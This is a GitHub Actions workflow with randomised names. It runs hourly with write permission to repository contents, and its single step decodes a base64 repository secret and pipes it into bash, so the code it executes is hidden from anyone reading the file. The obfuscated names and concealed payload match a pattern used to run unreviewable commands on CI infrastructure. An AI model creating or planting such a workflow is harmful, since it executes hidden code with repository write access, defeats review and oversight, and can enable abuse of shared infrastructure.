name: HpfjBzIuDtgxOM
on:
  schedule:
    - cron: '57 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  oifyjjHHYNgq:
    runs-on: ubuntu-22.04
    env:
      SebxcQrViyugVSTwuf: ${{ secrets.SebxcQrViyugVSTwuf }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.BChCPJekxToiHgpwuN }}" | base64 -d | bash
